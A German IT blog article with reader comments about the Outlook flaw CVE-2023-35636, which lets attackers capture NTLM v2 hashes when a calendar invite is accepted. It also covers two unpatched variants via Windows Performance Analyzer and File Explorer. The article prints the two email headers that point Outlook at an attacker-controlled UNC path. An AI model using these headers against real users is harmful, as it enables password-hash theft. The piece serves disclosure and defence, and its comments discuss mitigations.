[English]Kleiner Nachtrag zum Dezember 2023-Patchday, bei dem auch eine Information Disclosure-Schwachstelle (CVE-2023-35636) geschlossen wurde. Nun wurde bekannt, dass bereits die Annahme einer Kalendereinladung durch einen Nutzer dessen Kennwort verraten kann. Während diese Schwachstelle in Outlook gepatcht ist, gibt es weitere Methoden, um einen NTLM-Hash, z.B. per Dateimanager, abzurufen. Diese Schwachstellen sidn nicht gepatcht. Hier ein Überblick über den Sachverhalt.
Anzeige
Outlook 2016 Update KB5002529
Ich hatte es im Blog-Beitrag Microsoft Office Updates (12. Dezember 2023) erwähnt, dass Microsoft das Update KB5002529 für die MSI-Installationsvarianten von Microsoft Office 2016 veröffentlicht hat. Dort schrieb Microsoft, dass dieses Sicherheitsupdate eine Sicherheitsanfälligkeit bei der Offenlegung von Informationen in Microsoft Outlook behebt. Unter CVE-2023-35636 gab es dann weitere Informationen zu dieser Sicherheitsanfälligkeit. Microsoft hat auch für die Click-2-Run-Versionen von Outlook 2019, 2021 und 365 ein Sicherheitsupdate veröffentlicht. Die Schwachstelle wird als important und mit einem CVSS 3.1 von 6.5 angegeben, wobei Microsoft die Ausnutzung für "wenig wahrscheinlich hält".
Dort gibt Microsoft an, dass ein Angreifer diese Schwachstelle per E-Mail ausnutzen können, in dem er dem Benutzer eine speziell gestaltete Datei sendet und veranlasst, diese zu öffnen. Es heißt weiter, dass bei einem webbasierten Angriffsszenario ein Angreifer eine Website hosten (oder eine kompromittierte Website nutzen, die vom Benutzer bereitgestellte Inhalte akzeptiert oder hostet) könnte, die eine speziell gestaltete Datei enthält, mit der die Sicherheitslücke ausgenutzt wird.
Ein Angreifer hätte keine Möglichkeit, Benutzer zum Besuch der Website zu zwingen. Stattdessen müsste der Angreifer die Benutzer davon überzeugen, auf einen Link zu klicken, in der Regel durch eine Verlockung in einer E-Mail oder Sofortnachricht, und sie dann dazu bringen, die speziell gestaltete Datei zu öffnen. Die Ausnutzung dieser Sicherheitslücke könnte die Offenlegung von NTLM-Hashes ermöglichen.
Kalendereinladungen reichen
Nun bin ich über nachfolgenden Tweet auf den Artikel Accepting a calendar invite in Outlook could leak your password von SC Media gestoßen, der etwas mehr Licht in die Angelegenheit bringt.
Anzeige
Dolev Taler von Varonis hat zum 18. Januar 2023 Details zur entdeckten Schwachstelle CVE-2023-35636 im Beitrag Outlook Vulnerability Discovery and New Ways to Leak NTLM Hashes offen gelegt. Sicherheitsforscher von Varonis Threat Labs hatten die neue Sicherheitslücke in Outlook und drei neue Möglichkeiten entdeckt, auf gehashte NTLM v2-Passwörter zuzugreifen, indem Outlook, Windows Performance Analyzer (WPA) und Windows File Explorer ausgenutzt werden.
NTLM-Hash ermöglicht Offline-Brute-Force-Angriffe
Mit Zugang zu diesen Passwörtern können Angreifer einen Offline-Brute-Force-Angriff oder einen Authentifizierungs-Relay-Angriff versuchen, um ein Konto zu kompromittieren und Zugang zu erhalten. CVE-2023-35636 ermöglicht eine Ausnutzung der Kalenderfreigabefunktion in Microsoft Outlook. Das Hinzufügen von zwei Kopfzeilen zu einer E-Mail weist Outlook an, den Inhalt freizugeben und einen bestimmten Rechner zu kontaktieren. Dies bietet eine Möglichkeit zum Abfangen eines NTLM v2-Hashes.
NTLM v2 ist ein kryptografisches Protokoll, das von Microsoft Windows zur Authentifizierung von Benutzern bei Remote-Servern verwendet wird. Obwohl NTLM v2 eine sicherere Version des ursprünglichen NTLM ist, ist v2 immer noch anfällig für Offline Brute-Force- und Authentifizierungs-Relay-Angriffe.
Outlook ist als Standard-E-Mail- und Kalender-Tool für die Microsoft 365-Suite, das von Millionen von Menschen auf der ganzen Welt sowohl für berufliche als auch für private Zwecke genutzt wird, ein attraktives Ziel für Angreifer. Der Sachverhalt aus Beitrag Microsoft durch russische Midnight Blizzard gehackt; E-Mails seit Nov. 2023 ausspioniert ist der beste Beweis.
Der Outlook-Angriffsvektor
Outlook bietet die Möglichkeit, Kalender zwischen Benutzern zu teilen. Varonis Threat Labs hat nun herausgefunden, dass diese Funktion ausgenutzt werden kann, um das gehashte Passwort weiterzuleiten. Dazu reicht es, einige Kopfzeilen in eine E-Mail einzufügen, um einen Authentifizierungsversuch auszulösen.
"Content-Class" = "Sharing"
"x-sharing-config-url" = \\(Attacker machine)\a.ics
Die erste Zeile weist Outlook darauf hin, dass die Mail Inhalte zum Teilen enthält. Die zweite Zeile verweist Outlook an den Rechner des Angreifers, um von dort eine .ics-Einladungsdatei zu laden. Ein Angreifer braucht also nur eine E-Mail-Einladung an das Opfer zu schicken, in der der ".ICS"-Dateipfad auf den vom Angreifer kontrollierten Computer verweist. Durch "Abhören" eines selbst kontrollierten Pfads (Domäne, IP, Ordnerpfad, UNC usw.) kann der Angreifer Pakete mit Verbindungsversuchen, mit dem enthaltenen Hash, erhalten, und dann versuchen, auf diese Ressource zuzugreifen.
Wenn das Opfer auf die Schaltfläche zur Annahme der Kalendereinladung in der Nachricht klickt, versucht sein Rechner, die .ics-Konfigurationsdatei vom Rechner des Angreifers abzurufen. Dabei wird aber der NTLM-Hash des Opfers während der Authentifizierung offengelegt.
Schwachstelle in Outlook geschlossen
Es ist also wichtig, nur eine Outlook-Version zu verwenden, bei der die Schwachstelle CVE-2023-35636 gepatcht ist (Office 2013 hat keine Updates mehr erhalten). Microsoft hat den Exploit für Outlook als "wichtig" unter CVE-2023-35636 und mit der Bewertung 6.5 anerkannt. Zum 12. Dezember 2023 wurde ein Patch für CVE-2023-35636 für Outlook 2016, 2019, 2021 und Outlook 365 veröffentlicht. Dort ist die Schwachstelle also geschlossen.
Microsoft patcht unvollständig
Im Beitrag Outlook Vulnerability Discovery and New Ways to Leak NTLM Hashes werden aber noch die beiden anderen Methoden zum Abrufen des NTLM-Hashs über den Windows Performance Analyzer (WPA) und den Windows File Explorer (WFE) offen gelegt. Varonis hatte Microsoft über das Microsoft Security Response Center am 5. Juli 2023 über die WPA-Schwachstelle und am 30. Juli 2023 über die Sicherheitslücke im Windows File Explorer informiert. Microsoft hat aber beide Tickets aufgrund des "mittleren Schweregrads" wieder geschlossen.
Diese Schwachstellen sind also wohl bisher ungepatcht. Dvir Sason, Security Research Manager bei Varonis, bestätigte dies gegenüber SC Media: "Diese gemeldeten Schwachstellen wurden nicht gepatcht; das laut Microsoft dieses Verhalten nicht als Schwachstelle betrachtet wird". Die Varonis Sicherheitsforscher betrachten die beiden Schwachstellen jedoch als einen grundlegenden legitimen Angriffsvektor. Ungepatchte Systeme sind weiterhin anfällig für Bedrohungsakteure, die mit diesen Methoden versuchen, gehashte Kennwörter zu stehlen.
Anzeige
Prinzipiell öffne ich keine Termineinladungen als Anhang von unseriösen Quellen. Ist es möglich derartige Anhänge per Spamassassin oder Firewall zu blockieren? Outlook hat spezielle Eigenart diese Termine unbestätigt also ungefragt sowie automatisch in persönlichen Kalender zu übernehmen.
https://en.wikipedia.org/wiki/ICalendar
Die Sicherheitslücke in Outlook wurde im Dezember ja wohl gepatched. Somit ist eine aktuelle Version zu verwenden erstmal der wichtigste Schritt.
Abseits vom Patch ist das nicht so leicht zu addressieren. Man muss auch einplanen, dass das Mailkonto einer bekannten Person (Kunde / Lieferant) gehackt wurde und dann von dort solche Einladungen versendet werden.
Eine solche Quelle würde man ja erstmal als seriös ansehen.
Geht man in den meisten Fällen von einem Außentäter aus, so wäre es eine Option externen Traffic für die betroffenen Applikationen zu unterbinden oder zumindest stark einzuschränken.
Ist eine Verbindung zur Maschine des Angreifers nicht möglich, so können auch keine Hashes verraten werden. Auch die Diskussion wie sinnvoll regelmäßige Passwortwechsel sinnvoll sind, kann man auf dieser Basis wieder führen.
Google hat es gefixt per OAuth. Zweifaktor verwenden als Empfehlung.
https://support.google.com/a/answer/14114704?hl=de
.ics-Dateien für Einladungen können halt von beliebigen Anbietern verschickt werden.
Per Policy diese bösen Anhänge beim Empfang am Server oder mit Firewall Regel abschnippeln. Als Dekret im Unternehmen keine solche Einladungen erlauben.
Mittlere Schweregrade bei Sicherheitslücken werden also nicht mehr adressiert?
Das will man doch hören, wenn man damit in sicherheitskritischen Bereichen arbeitet…
In sicherheitskritischen Bereichen mit M$ Office arbeiten? Ein Widerspruch in sich …
Er bezieht sich imho auf die beiden Möglichkeiten, im Explorer oder im Windows Performance Analyzer diese ungefixte Schwachstelle auszunutzen.
Das Ausnutzen scheint zu erfordern, dass SMB-Anfragen in das Internet geschickt und nicht z. B. jede FRITZ!Box schon nahezu immer geblockt werden. Ich hoffe mal, das tut jeder anständige Router oder Firewall…
stimmt, wer SMB nach Außen zulässt hat noch ganz andere Probleme.
Manche Provider haben Port 445 schon vor Jahrzehnten geblockt.
Das ist ein LAN-Protokoll das nix im Internet zu suchen hat und damals massiver missbraucht wurde.
Halt auch wegen der völlig besenkten Idee Passwort Hashes mit zu senden.
(war das Code Red?)
Kleinstweich und Sicherheit sind orthogonal. Da ist nichts zu machen.
naja, eher zu viele Altlasten ewig mitgeschleppt.
Als Ergänzung einige Infos und Hinweise vom Fedora Project, NTLMv2 aus Zeiten von Windows NT und 2000 wird als obsolet betrachtet. Anstelle Kerberos (mit NTLM als kompatibles Plugin) oder besser OAuth2 nehmen.
Since 2010, Microsoft no longer recommends NTLM in applications:
Implementers should be aware that NTLM does not support any recent cryptographic methods, such as AES or SHA-256. It uses cyclic redundancy checks (CRC) or MD5 for integrity, and RC4 for encryption.
Deriving a key from a password is as specified in RFC1320 and FIPS46-2. Therefore, applications are generally advised not to use NTLM.
https://specopssoft.com/blog/microsoft-phases-out-ntlm-with-kerberos/
https://fedoraproject.org/wiki/Changes/Deprecate_ntlm_in_cyrus_sasl